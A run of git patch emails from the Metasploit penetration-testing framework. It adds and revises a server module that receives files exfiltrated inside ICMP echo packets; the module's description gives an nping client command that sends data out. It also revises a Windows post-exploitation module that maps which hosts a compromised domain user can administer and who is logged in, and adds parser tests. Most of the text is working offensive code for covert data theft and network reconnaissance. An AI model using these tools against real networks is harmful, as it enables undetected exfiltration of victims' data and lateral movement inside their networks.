get_interface_guid(@interface) - @iface_ip = datastore['LOCALIP'] - @iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces - raise "Interface IP is not defined and can not be guessed" unless @iface_ip - - # start with blank slate - @record = false - @record_data = '' - - if datastore['PROMISC'] - print_status("Warning: Promiscuous mode enabled. This may cause issues!") - end - - # start icmp listener process - loop - icmp_listener - - ensure - store_file - print_status("\nStopping ICMP listener on #{@interface} (#{@iface_ip})") - end - end - - def icmp_listener - # start icmp listener - - print_status("ICMP Listener started on #{@interface} (#{@iface_ip}). Monitoring for trigger packet containing #{datastore['START_TRIGGER']}") - if datastore['FNAME_IN_PACKET'] - print_status("Filename expected in initial packet, directly following trigger (e.g. #{datastore['START_TRIGGER']}filename.ext)") - end - - cap = PacketFu::Capture.new( - :iface => @interface, - :start => true, - :filter => datastore['BPF_FILTER'], - :promisc => datastore['PROMISC'] - ) - loop { - cap.stream.each do | pkt | - packet = PacketFu::Packet.parse(pkt) - data = packet.payload[4..-1] - - if packet.is_icmp? and data =~ /#{datastore['START_TRIGGER']}/ - # start of new file detected - vprint_status("#{Time.now}: ICMP (type %d code %d) SRC:%s DST:%s" % - [packet.icmp_type, packet.icmp_code, packet.ip_saddr, packet.ip_daddr]) - - # detect and warn if system is responding to ICMP echo requests - # suggested fixes: - # -(linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all - # -(Windows) netsh firewall set icmpsetting 8 disable - # -(Windows) netsh firewall set opmode mode = ENABLE - - if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip - raise RuntimeError , "Dectected ICMP echo response. Disable OS ICMP handling!" - end - - if @record - print_error("New file started without saving old data") - store_file - end - - # begin recording stream - @record = true - @record_host = packet.ip_saddr - @record_data = '' - - # set filename from data in incoming icmp packet - if datastore['FNAME_IN_PACKET'] - @filename = data[((datastore['START_TRIGGER'].length)-1)..-1].strip - end - # if filename not sent in packet, or FNAME_IN_PACKET false set time based name - if not datastore['FNAME_IN_PACKET'] or @filename.empty? - @filename = "icmp_exfil_" + ::Time.now.to_i.to_s # set filename based on current time - end - - print_good("Beginning capture of \"#{@filename}\" data") - - # create response packet icmp_pkt - icmp_response, contents = icmp_packet(packet, datastore['RESP_START']) - - if not icmp_response - raise RuntimeError ,"Could not build ICMP response" - else - # send response packet icmp_pkt - send_icmp(icmp_response, contents) - end - - elsif packet.is_icmp? and @record and @record_host == packet.ip_saddr - # check for EOF marker, if not continue recording data - - if data =~ /#{datastore['END_TRIGGER']}/ - # end of file marker found - print_status("#{@record_data.length} bytes of data recevied in total") - print_good("End of File received. Saving \"#{@filename}\" to loot") - store_file - - # create response packet icmp_pkt - icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) - - if not icmp_response - raise RuntimeError , "Could not build ICMP response" - else - # send response packet icmp_pkt - send_icmp(icmp_response, contents) - end - - # turn off recording and clear status - @record = false - @record_host = '' - @record_data = '' - - else - # add data to recording and continue - @record_data << data.to_s() - vprint_status("Received #{data.length} bytes of data from #{packet.ip_saddr}") - - # create response packet icmp_pkt - icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT']) - - if not icmp_response - raise RuntimeError , "Could not build ICMP response" - else - # send response packet icmp_pkt - send_icmp(icmp_response, contents) - end - end - end - end - } - end - - def icmp_packet(packet, contents) - # create icmp response - - @src_ip = packet.ip_daddr - src_mac = packet.eth_daddr - @dst_ip = packet.ip_saddr - dst_mac = packet.eth_saddr - icmp_id = packet.payload[0,2] - icmp_seq = packet.payload[2,2] - - # create payload with matching id/seq - resp_payload = icmp_id + icmp_seq + contents - - icmp_pkt = PacketFu::ICMPPacket.new(:flavor => datastore['CLOAK'].downcase) - icmp_pkt.eth_saddr = src_mac - icmp_pkt.eth_daddr = dst_mac - icmp_pkt.icmp_type = 0 - icmp_pkt.icmp_code = 0 - icmp_pkt.payload = resp_payload - icmp_pkt.ip_saddr = @src_ip - icmp_pkt.ip_daddr = @dst_ip - icmp_pkt.recalc - - icmp_response = icmp_pkt - - return icmp_response, contents - end - - def send_icmp(icmp_response, contents) - # send icmp response on selected interface - icmp_response.to_w(iface = @interface) - vprint_good("Response sent to #{@dst_ip} containing response trigger : \"#{contents}\"") - end - - def store_file - # store the file in loot if data is present - if @record_data and not @record_data.empty? - loot = store_loot( - "icmp_exfil", - "text/xml", - @src_ip, - @record_data, - @filename, - "ICMP Exfiltrated Data" - ) - print_good("Incoming file \"#{@filename}\" saved to loot") - print_good("Loot filename: #{loot}") - end - end -end \ No newline at end of file +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Capture + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'ICMP Exfiltration Service', + 'Description' => %q{ + This module is designed to provide a server-side component to receive and store files + exfiltrated over ICMP echo request packets. + + To use this module you will need to send an initial ICMP echo request containing the + specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or + a random filename can be assisnged). All data received from this source will automatically + be added to the receive buffer until an ICMP echo request containing a specific end trigger + (defaults to '^EOL') is received. + + Suggested Client: + Data can be sent from the client using a variety of tools. One such example is nping (included + with the NMAP suite of tools) - usage: nping --icmp 10.0.0.1 --data-string "BOFtest.txt" -c1 + }, + 'Author' => 'Chris John Riley', + 'License' => MSF_LICENSE, + 'References' => + [ + # packetfu + ['URL','http://code.google.com/p/packetfu/'], + # nping + ['URL', 'http://nmap.org/book/nping-man.html'], + # simple icmp + ['URL', 'http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/'] + ] + ) + + register_options([ + OptString.new('START_TRIGGER', [true, 'Trigger for beginning of file', '^BOF']), + OptString.new('END_TRIGGER', [true, 'Trigger for end of file', '^EOF']), + OptString.new('RESP_START', [true, 'Data to respond when initial trigger matches', 'SEND']), + OptString.new('RESP_CONT', [true, 'Data ro resond when continuation of data expected', 'OK']), + OptString.new('RESP_END', [true, 'Data to response when EOF received and data saved', 'COMPLETE']), + OptString.new('BPF_FILTER', [true, 'BFP format filter to listen for', 'icmp']), + OptString.new('INTERFACE', [false, 'The name of the interface']), + OptBool.new('FNAME_IN_PACKET', [true, 'Filename presented in first packet straight after START_TRIGGER', true]) + ], self.class) + + register_advanced_options([ + OptEnum.new('CLOAK', [true, 'OS fingerprint to use for packet creation', 'linux', ['windows', 'linux', 'freebsd']]), + OptBool.new('PROMISC', [true, 'Enable/Disable promiscuous mode', false]), + OptAddress.new('LOCALIP', [false, 'The IP address of the local interface']) + ], self.class) + + deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT') + end + + def run + begin + # check Pcaprub is up to date + if not netifaces_implemented? + print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available") + netifaces = false + else + netifaces = true + end + + @interface = datastore['INTERFACE'] || Pcap.lookupdev + # this is needed on windows cause we send interface directly to Pcap functions + @interface = get_interface_guid(@interface) + @iface_ip = datastore['LOCALIP'] + @iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces + raise "Interface IP is not defined and can not be guessed" unless @iface_ip + + # start with blank slate + @record = false + @record_data = '' + + if datastore['PROMISC'] + print_status("Warning: Promiscuous mode enabled. This may cause issues!") + end + + # start icmp listener process - loop + icmp_listener + + ensure + store_file + print_status("\nStopping ICMP listener on #{@interface} (#{@iface_ip})") + end + end + + def icmp_listener + # start icmp listener + + print_status("ICMP Listener started on #{@interface} (#{@iface_ip}). Monitoring for trigger packet containing #{datastore['START_TRIGGER']}") + if datastore['FNAME_IN_PACKET'] + print_status("Filename expected in initial packet, directly following trigger (e.g. #{datastore['START_TRIGGER']}filename.ext)") + end + + cap = PacketFu::Capture.new( + :iface => @interface, + :start => true, + :filter => datastore['BPF_FILTER'], + :promisc => datastore['PROMISC'] + ) + loop { + cap.stream.each do | pkt | + packet = PacketFu::Packet.parse(pkt) + data = packet.payload[4..-1] + + if packet.is_icmp? and data =~ /#{datastore['START_TRIGGER']}/ + # start of new file detected + vprint_status("#{Time.now}: ICMP (type %d code %d) SRC:%s DST:%s" % + [packet.icmp_type, packet.icmp_code, packet.ip_saddr, packet.ip_daddr]) + + # detect and warn if system is responding to ICMP echo requests + # suggested fixes: + # -(linux) echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all + # -(Windows) netsh firewall set icmpsetting 8 disable + # -(Windows) netsh firewall set opmode mode = ENABLE + + if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip + raise RuntimeError , "Dectected ICMP echo response. Disable OS ICMP handling!" + end + + if @record + print_error("New file started without saving old data") + store_file + end + + # begin recording stream + @record = true + @record_host = packet.ip_saddr + @record_data = '' + + # set filename from data in incoming icmp packet + if datastore['FNAME_IN_PACKET'] + @filename = data[((datastore['START_TRIGGER'].length)-1)..-1].strip + end + # if filename not sent in packet, or FNAME_IN_PACKET false set time based name + if not datastore['FNAME_IN_PACKET'] or @filename.empty? + @filename = "icmp_exfil_" + ::Time.now.to_i.to_s # set filename based on current time + end + + print_good("Beginning capture of \"#{@filename}\" data") + + # create response packet icmp_pkt + icmp_response, contents = icmp_packet(packet, datastore['RESP_START']) + + if not icmp_response + raise RuntimeError ,"Could not build ICMP response" + else + # send response packet icmp_pkt + send_icmp(icmp_response, contents) + end + + elsif packet.is_icmp? and @record and @record_host == packet.ip_saddr + # check for EOF marker, if not continue recording data + + if data =~ /#{datastore['END_TRIGGER']}/ + # end of file marker found + print_status("#{@record_data.length} bytes of data recevied in total") + print_good("End of File received. Saving \"#{@filename}\" to loot") + store_file + + # create response packet icmp_pkt + icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) + + if not icmp_response + raise RuntimeError , "Could not build ICMP response" + else + # send response packet icmp_pkt + send_icmp(icmp_response, contents) + end + + # turn off recording and clear status + @record = false + @record_host = '' + @record_data = '' + + else + # add data to recording and continue + @record_data << data.to_s() + vprint_status("Received #{data.length} bytes of data from #{packet.ip_saddr}") + + # create response packet icmp_pkt + icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT']) + + if not icmp_response + raise RuntimeError , "Could not build ICMP response" + else + # send response packet icmp_pkt + send_icmp(icmp_response, contents) + end + end + end + end + } + end + + def icmp_packet(packet, contents) + # create icmp response + + @src_ip = packet.ip_daddr + src_mac = packet.eth_daddr + @dst_ip = packet.ip_saddr + dst_mac = packet.eth_saddr + icmp_id = packet.payload[0,2] + icmp_seq = packet.payload[2,2] + + # create payload with matching id/seq + resp_payload = icmp_id + icmp_seq + contents + + icmp_pkt = PacketFu::ICMPPacket.new(:flavor => datastore['CLOAK'].downcase) + icmp_pkt.eth_saddr = src_mac + icmp_pkt.eth_daddr = dst_mac + icmp_pkt.icmp_type = 0 + icmp_pkt.icmp_code = 0 + icmp_pkt.payload = resp_payload + icmp_pkt.ip_saddr = @src_ip + icmp_pkt.ip_daddr = @dst_ip + icmp_pkt.recalc + + icmp_response = icmp_pkt + + return icmp_response, contents + end + + def send_icmp(icmp_response, contents) + # send icmp response on selected interface + icmp_response.to_w(iface = @interface) + vprint_good("Response sent to #{@dst_ip} containing response trigger : \"#{contents}\"") + end + + def store_file + # store the file in loot if data is present + if @record_data and not @record_data.empty? + loot = store_loot( + "icmp_exfil", + "text/xml", + @src_ip, + @record_data, + @filename, + "ICMP Exfiltrated Data" + ) + print_good("Incoming file \"#{@filename}\" saved to loot") + print_good("Loot filename: #{loot}") + end + end +end From 74e543ec5a00c7c6543d5ff11c74630bf24e99e1 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 27 Dec 2012 14:23:05 -0600 Subject: [PATCH 085/154] add spec skeleton for packet parser --- spec/lib/rex/post/meterpreter/packet_parser_spec.rb | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 spec/lib/rex/post/meterpreter/packet_parser_spec.rb diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb new file mode 100644 index 0000000000..8b31b53f2f --- /dev/null +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -0,0 +1,4 @@ +require 'rex/post/meterpreter/packet_parser' + + + From c695f429d56859ef5f6ecadd703b918b478d5f7d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 27 Dec 2012 14:56:49 -0600 Subject: [PATCH 086/154] Mirror upstream PacketFu fix on ICMP size --- lib/packetfu/packetfu/protos/icmp.rb | 2 +- modules/auxiliary/server/icmp_exfil.rb | 5 ++++- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/lib/packetfu/packetfu/protos/icmp.rb b/lib/packetfu/packetfu/protos/icmp.rb index 943471d82e..10f2d5d146 100644 --- a/lib/packetfu/packetfu/protos/icmp.rb +++ b/lib/packetfu/packetfu/protos/icmp.rb @@ -124,7 +124,7 @@ module PacketFu attr_accessor :eth_header, :ip_header, :icmp_header def self.can_parse?(str) - return false unless str.size >= 54 + return false unless str.size >= 38 return false unless EthPacket.can_parse? str return false unless IPPacket.can_parse? str return false unless str[23,1] == "\x01" diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 4d3530a8f6..a3e19ceecf 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ # packetfu - ['URL','http://code.google.com/p/packetfu/'], + ['URL','https://github.com/todb/packetfu'], # nping ['URL', 'http://nmap.org/book/nping-man.html'], # simple icmp @@ -98,6 +98,7 @@ class Metasploit3 < Msf::Auxiliary def icmp_listener # start icmp listener + $stderr.puts "Starting for real" print_status("ICMP Listener started on #{@interface} (#{@iface_ip}). Monitoring for trigger packet containing #{datastore['START_TRIGGER']}") if datastore['FNAME_IN_PACKET'] @@ -114,6 +115,8 @@ class Metasploit3 < Msf::Auxiliary cap.stream.each do | pkt | packet = PacketFu::Packet.parse(pkt) data = packet.payload[4..-1] + $stderr.puts packet.inspect + $stderr.puts packet.inspect_hex if packet.is_icmp? and data =~ /#{datastore['START_TRIGGER']}/ # start of new file detected From c6533621a0e41006e6ad97c2672238a95c1e91c5 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 27 Dec 2012 14:58:52 -0600 Subject: [PATCH 087/154] Oops removing debug prints --- modules/auxiliary/server/icmp_exfil.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index a3e19ceecf..49b69c6d6c 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -98,7 +98,6 @@ class Metasploit3 < Msf::Auxiliary def icmp_listener # start icmp listener - $stderr.puts "Starting for real" print_status("ICMP Listener started on #{@interface} (#{@iface_ip}). Monitoring for trigger packet containing #{datastore['START_TRIGGER']}") if datastore['FNAME_IN_PACKET'] @@ -115,8 +114,6 @@ class Metasploit3 < Msf::Auxiliary cap.stream.each do | pkt | packet = PacketFu::Packet.parse(pkt) data = packet.payload[4..-1] - $stderr.puts packet.inspect - $stderr.puts packet.inspect_hex if packet.is_icmp? and data =~ /#{datastore['START_TRIGGER']}/ # start of new file detected From c2586d09072593eb8d4a0727763fc60526709eae Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 27 Dec 2012 15:18:18 -0600 Subject: [PATCH 088/154] Instead of raising, offer advice on BPF filtering Many people don't know how to disable ICMP echo responses off the top of their head. However, the problem is solvable with a decent BPF filter. --- modules/auxiliary/server/icmp_exfil.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index 49b69c6d6c..c6a0321c80 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -127,7 +127,10 @@ class Metasploit3 < Msf::Auxiliary # -(Windows) netsh firewall set opmode mode = ENABLE if packet.icmp_type == 0 and packet.icmp_code == 0 and packet.ip_saddr == @iface_ip - raise RuntimeError , "Dectected ICMP echo response. Disable OS ICMP handling!" + print_error "Dectected ICMP echo response. You must either disable ICMP handling" + print_error "or try a more restrictive BPF filter. You might try:" + print_error " set BPF_FILTER icmp and not src #{datastore['LOCALIP']}" + return end if @record From ee6db8794e10d37407318544ee4e4d69c16c3663 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 27 Dec 2012 17:19:37 -0600 Subject: [PATCH 089/154] Basic specs for meterpreter packet parser --- .../post/meterpreter/packet_parser_spec.rb | 55 +++++++++++++++++++ 1 file changed, 55 insertions(+) diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb index 8b31b53f2f..4fefeebe76 100644 --- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -1,4 +1,59 @@ +require 'rex/post/meterpreter/packet' require 'rex/post/meterpreter/packet_parser' +describe Rex::Post::Meterpreter::PacketParser do + subject{ + Rex::Post::Meterpreter::PacketParser.new + } + before(:each) do + @req_packt = Rex::Post::Meterpreter::Packet.new( + Rex::Post::Meterpreter::PACKET_TYPE_REQUEST, + "test_method") + @raw = @req_packt.to_r + @sock = double('Socket') + @sock.stub(:read) do |arg| + @raw.slice!(0,arg) + end + end + it "should respond to cipher" do + subject.should respond_to :cipher + end + + it "should respond to raw" do + subject.should respond_to :raw + end + + it "should respond to reset" do + subject.should respond_to :reset + end + + it "should respond to recv" do + subject.should respond_to :recv + end + + it "should respond to hdr_length_left" do + subject.should respond_to :hdr_length_left + end + + it "should respond to payload_length_left" do + subject.should respond_to :payload_length_left + end + + it "should initialise with expected defaults" do + subject.send(:raw).should == "" + subject.send(:hdr_length_left).should == 8 + subject.send(:payload_length_left).should == 0 + end + + it "should parse valid raw data into a packet object" do + while @raw.length >0 + parsed_packet = subject.recv(@sock) + end + parsed_packet.class.should == Rex::Post::Meterpreter::Packet + parsed_packet.type.should == Rex::Post::Meterpreter::PACKET_TYPE_REQUEST + parsed_packet.method?("test_method").should == true + end + +end From f6478678ce441047424c6ca39f7ad8f1f128b1fe Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 27 Dec 2012 23:08:50 -0600 Subject: [PATCH 090/154] trailing whitespace --- spec/lib/rex/post/meterpreter/packet_parser_spec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb index 4fefeebe76..61248dcd28 100644 --- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -8,7 +8,7 @@ describe Rex::Post::Meterpreter::PacketParser do } before(:each) do @req_packt = Rex::Post::Meterpreter::Packet.new( - Rex::Post::Meterpreter::PACKET_TYPE_REQUEST, + Rex::Post::Meterpreter::PACKET_TYPE_REQUEST, "test_method") @raw = @req_packt.to_r @sock = double('Socket') From ddd4b7ef6007b04cc17b829eb33bcbeaeb47f3cc Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 28 Dec 2012 02:26:40 -0600 Subject: [PATCH 091/154] Applying fixes --- .../windows/gather/local_admin_search_enum.rb | 82 +++++++++++-------- 1 file changed, 48 insertions(+), 34 deletions(-) diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb index 383c7cd43b..fb0e2f4666 100644 --- a/modules/post/windows/gather/local_admin_search_enum.rb +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -1,10 +1,11 @@ ## -# ## This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## + require 'msf/core' require 'rex' require 'msf/core/post/common' @@ -17,35 +18,42 @@ class Metasploit3 < Msf::Post include Msf::Post::Common def initialize(info={}) - super( - 'Name' => 'Windows Local Admin Search', + super(update_info(info, + 'Name' => 'Windows Gather Local Admin Search', 'Description' => %q{ - This module will identify systems in a given range that the + This module will identify systems in a given range that the supplied domain user (should migrate into a user pid) has administrative - access to by using the windows api OpenSCManagerA to establishing a handle + access to by using the Windows API OpenSCManagerA to establishing a handle to the remote host. Additionally it can enumerate logged in users and group - membership via windows api NetWkstaUserEnum and NetUserGetGroups. - }, + membership via Windows API NetWkstaUserEnum and NetUserGetGroups. + }, 'License' => MSF_LICENSE, - 'Version' => '$Revision: 14767 $', - 'Author' => [ 'Brandon McCann "zeknox" ', 'Thomas McCarthy "smilingraccoon" ', 'Royce Davis "r3dy" '], + 'Author' => + [ + 'Brandon McCann "zeknox" ', + 'Thomas McCarthy "smilingraccoon" ', + 'Royce Davis "r3dy" ' + ], 'Platform' => [ 'windows'], 'SessionTypes' => [ 'meterpreter' ] - ) + )) register_options( [ OptBool.new('ENUM_USERS', [ true, 'Enumerates logged on users.', true]), OptBool.new('ENUM_GROUPS', [ false, 'Enumerates groups for identified users.', true]), - OptString.new('DOMAIN', [false, 'Domain to enumerate user\'s groups for', nil]), - OptString.new('DOMAIN_CONTROLLER', [false, 'Domain Controller to query groups', nil]) - + OptString.new('DOMAIN', [false, 'Domain to enumerate user\'s groups for']), + OptString.new('DOMAIN_CONTROLLER', [false, 'Domain Controller to query groups']) ], self.class) end def setup super + # This datastore option can be modified during runtime. + # Saving it here so the modified value remains with this module. + @domain_controller = datastore['DOMAIN_CONTROLLER'] + if is_system? # running as SYSTEM and will not pass any network credentials print_error "Running as SYSTEM, module should be run with USER level rights" @@ -59,7 +67,7 @@ class Metasploit3 < Msf::Post datastore['DOMAIN'] = user.split('\\')[0] end - if datastore['DOMAIN_CONTROLLER'].nil? and datastore['ENUM_GROUPS'] + if @domain_controll.nil? and datastore['ENUM_GROUPS'] @dc_error = false # Uses DC which applied policy since it would be a DC this device normally talks to @@ -72,7 +80,7 @@ class Metasploit3 < Msf::Post # Check if RSOP data exists, if not disable group check unless res =~ /does not have RSOP data./ - datastore['DOMAIN_CONTROLLER'] = /Group Policy was applied from:\s*(.*)\s*/.match(res)[1].chomp + @domain_controller = /Group Policy was applied from:\s*(.*)\s*/.match(res)[1].chomp else @dc_error = true print_error("User never logged into device, will not enumerate groups or manually specify DC.") @@ -89,13 +97,19 @@ class Metasploit3 < Msf::Post # http://msdn.microsoft.com/en-us/library/windows/desktop/aa370669(v=vs.85).aspx # enumerate logged in users def enum_users(host) + userlist = Array.new + begin # Connect to host and enumerate logged in users winsessions = client.railgun.netapi32.NetWkstaUserEnum("\\\\#{host}", 1, 4, -1, 4, 4, nil) rescue ::Exception => e print_error("Issue enumerating users on #{host}") - print_error(e.backtrace) if datastore['VERBOSE'] + vprint_error(e.backtrace) + return userlist end + + return userlist if winsessions.nil? + count = winsessions['totalentries'] * 2 startmem = winsessions['bufptr'] @@ -105,7 +119,8 @@ class Metasploit3 < Msf::Post mem = client.railgun.memread(startmem, 8*count) rescue ::Exception => e print_error("Issue reading memory for #{host}") - print_error(e.backtrace) if datastore['VERBOSE'] + vprint_error(e.backtrace) + return userlist end # For each entry returned, get domain and name of logged in user begin @@ -137,7 +152,7 @@ class Metasploit3 < Msf::Post } rescue ::Exception => e print_error("Issue enumerating users on #{host}") - print_error(e.backtrace) if datastore['VERBOSE'] + vprint_error(e.backtrace) end return userlist end @@ -154,7 +169,8 @@ class Metasploit3 < Msf::Post rescue ::Exception => e print_error("Issue connecting to DC, try manually setting domain and DC") - print_error(e.backtrace) if datastore['VERBOSE'] + vprint_error(e.backtrace) + return grouplist end count = usergroups['totalentries'] @@ -165,7 +181,8 @@ class Metasploit3 < Msf::Post mem = client.railgun.memread(startmem, 8*count) rescue ::Exception => e print_error("Issue reading memory for groups for user #{user}") - print_error(e.backtrace) if datastore['VERBOSE'] + vprint_error(e.backtrace) + return grouplist end begin @@ -185,7 +202,8 @@ class Metasploit3 < Msf::Post rescue ::Exception => e print_error("Issue enumerating groups for user #{user}, check domain") - print_error(e.backtrace) if datastore['VERBOSE'] + vprint_error(e.backtrace) + return grouplist end return grouplist.chomp("\n\t- ") @@ -226,21 +244,17 @@ class Metasploit3 < Msf::Post # Write to notes database def db_note(host, data, type) - if db - report_note( - :type => type, - :data => data, - :host => host, - :update => :unique_data - ) - end + report_note( + :type => type, + :data => data, + :host => host, + :update => :unique_data + ) end # Write to loot database def db_loot(host, user, type) - if db - p = store_loot(type, 'text/plain', host, "#{host}:#{user}", 'hosts_localadmin.txt', user) - print_status("User data stored in: #{p}") if datastore['VERBOSE'] - end + p = store_loot(type, 'text/plain', host, "#{host}:#{user}", 'hosts_localadmin.txt', user) + vprint_status("User data stored in: #{p}") end end \ No newline at end of file From fc4da53be40898d9dda5a7d152f77f9e29ec1fb8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 28 Dec 2012 03:27:04 -0600 Subject: [PATCH 092/154] More fixes --- .../windows/gather/local_admin_search_enum.rb | 18 ++++++++---------- 1 file changed, 8 insertions(+), 10 deletions(-) diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb index fb0e2f4666..3194e8d120 100644 --- a/modules/post/windows/gather/local_admin_search_enum.rb +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Post @adv = client.railgun.advapi32 # Get domain and domain controller if options left blank - if datastore['DOMAIN'].nil? + if datastore['DOMAIN'].nil? or datastore['DOMAIN'].empty? user = client.sys.config.getuid datastore['DOMAIN'] = user.split('\\')[0] end @@ -104,7 +104,6 @@ class Metasploit3 < Msf::Post winsessions = client.railgun.netapi32.NetWkstaUserEnum("\\\\#{host}", 1, 4, -1, 4, 4, nil) rescue ::Exception => e print_error("Issue enumerating users on #{host}") - vprint_error(e.backtrace) return userlist end @@ -119,7 +118,7 @@ class Metasploit3 < Msf::Post mem = client.railgun.memread(startmem, 8*count) rescue ::Exception => e print_error("Issue reading memory for #{host}") - vprint_error(e.backtrace) + vprint_error(e.to_s) return userlist end # For each entry returned, get domain and name of logged in user @@ -162,26 +161,25 @@ class Metasploit3 < Msf::Post def enum_groups(user) grouplist = "" - dc = "\\\\#{datastore['DOMAIN_CONTROLLER']}" + dc = "\\\\#{@domain_controller}" begin # Connect to DC and enumerate groups of user usergroups = client.railgun.netapi32.NetUserGetGroups(dc, user, 0, 4, -1, 4, 4) - rescue ::Exception => e print_error("Issue connecting to DC, try manually setting domain and DC") - vprint_error(e.backtrace) + vprint_error(e.to_s) return grouplist end - count = usergroups['totalentries'] - startmem = usergroups['bufptr'] - base = 0 + count = usergroups['totalentries'] + startmem = usergroups['bufptr'] + base = 0 begin mem = client.railgun.memread(startmem, 8*count) rescue ::Exception => e print_error("Issue reading memory for groups for user #{user}") - vprint_error(e.backtrace) + vprint_error(e.to_s) return grouplist end From 707784f2ae3bad874ff02a6df91ca1a5fccf37cf Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 28 Dec 2012 03:46:59 -0600 Subject: [PATCH 093/154] Last fix --- .../windows/gather/local_admin_search_enum.rb | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb index 3194e8d120..72cfcc8d7f 100644 --- a/modules/post/windows/gather/local_admin_search_enum.rb +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -124,30 +124,30 @@ class Metasploit3 < Msf::Post # For each entry returned, get domain and name of logged in user begin count.times{|i| - temp = {} - userptr = mem[(base + 0),4].unpack("V*")[0] - temp[:user] = client.railgun.memread(userptr,255).split("\0\0")[0].split("\0").join - nameptr = mem[(base + 4),4].unpack("V*")[0] - temp[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join + temp = {} + userptr = mem[(base + 0),4].unpack("V*")[0] + temp[:user] = client.railgun.memread(userptr,255).split("\0\0")[0].split("\0").join + nameptr = mem[(base + 4),4].unpack("V*")[0] + temp[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join - # Ignore if empty or machine account - unless temp[:user].empty? or temp[:user][-1, 1] == "$" - - # Check if enumerated user's domain matches supplied domain, if there was - # an error, or if option disabled - data = "" - if datastore['DOMAIN'].upcase == temp[:domain].upcase and not @dc_error and datastore['ENUM_GROUPS'] - data << " - Groups: #{enum_groups(temp[:user]).chomp(", ")}" - end - line = "\tLogged in user:\t#{temp[:domain]}\\#{temp[:user]}#{data}\n" - - # Write user and groups to notes database - db_note(host, "#{temp[:domain]}\\#{temp[:user]}#{data}", "localadmin.user.loggedin") - userlist << line unless userlist.include? line + # Ignore if empty or machine account + unless temp[:user].empty? or temp[:user][-1, 1] == "$" + # Check if enumerated user's domain matches supplied domain, if there was + # an error, or if option disabled + data = "" + if datastore['DOMAIN'].upcase == temp[:domain].upcase and not @dc_error and datastore['ENUM_GROUPS'] + data << " - Groups: #{enum_groups(temp[:user]).chomp(", ")}" end + line = "\tLogged in user:\t#{temp[:domain]}\\#{temp[:user]}#{data}\n" - base = base + 8 + # Write user and groups to notes database + db_note(host, "#{temp[:domain]}\\#{temp[:user]}#{data}", "localadmin.user.loggedin") + userlist << line unless userlist.include? line + + end + + base = base + 8 } rescue ::Exception => e print_error("Issue 